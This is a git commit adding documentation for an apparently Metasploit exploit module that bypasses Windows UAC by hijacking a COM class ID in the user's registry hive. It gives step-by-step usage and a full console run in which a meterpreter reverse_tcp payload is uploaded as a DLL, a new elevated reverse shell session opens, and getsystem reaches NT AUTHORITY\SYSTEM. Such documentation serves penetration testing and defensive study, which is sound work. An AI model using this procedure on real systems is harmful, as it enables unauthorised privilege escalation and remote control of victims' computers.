Added comhijack module documentation

2017-08-16 13:05:27 +10:00 · 2017-08-16 13:05:27 +10:00 · 408a83a36b
parent 6ee5d83a15
commit 408a83a36b
1 changed files with 115 additions and 0 deletions
--- a/documentation/modules/exploit/windows/local/bypassuac_comhijack.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_comhijack.md
@ -0,0 +1,115 @@
+## Intro
+
+This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID
+that is located in the current user hive. This key contains a reference to a DLL that
+contains a chosen payload. Multiple COM vectors are defined in this module and one is
+chosen at random at runtime.
+
+The module modifies the registry in order for this exploit to work. The modification is
+reverted once the exploitation attempt has finished.
+
+This module requires that the payload architecture matches the target operating system
+architecture. This is due to the fact that the underlying binaries that are invoked
+match the system architecture.
+
+If a custom DLL is to be used with `EXE::Custom`, that DLL must match the system
+architecture, and should call `ExitProcess()` after starting the payload in a
+different process.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+1. Begin interacting with the module: `use exploit/windows/local/bypassuac_comhijack`.
+1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
+1. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+1. Make sure that the `SESSION` value is set to the existing session identifier.
+1. Invoke the module: `run`.
+
+## Scenario
+
+```
+msf exploit(bypassuac_comhijack) > sessions
+
+Active sessions
+===============
+
+  Id  Type                     Information                           Connection
+  --  ----                     -----------                           ----------
+  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
+
+msf exploit(bypassuac_comhijack) > sessions -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-5A73R51
+OS              : Windows 10 (Build 14393).
+Architecture    : x64
+System Language : en_AU
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(bypassuac_comhijack) > options
+
+Module options (exploit/windows/local/bypassuac_comhijack):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     xxx.xx.255.1     yes       The listen address
+   LPORT     8443             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf exploit(bypassuac_comhijack) > run
+
+[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
+[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
+[+] [2017.08.16-12:58:32] UAC is set to Default
+[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
+[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
+[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
+[*] [2017.08.16-12:58:33] Executing high integrity process ...
+[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
+[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
+[*] [2017.08.16-12:58:38] Cleaining up registry ...
+[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
+msf exploit(bypassuac_comhijack) > sessions
+
+Active sessions
+===============
+
+  Id  Type                     Information                           Connection
+  --  ----                     -----------                           ----------
+  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
+  2   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)
+
+msf exploit(bypassuac_comhijack) > sessions -1
+[*] Starting interaction with 2...
+
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```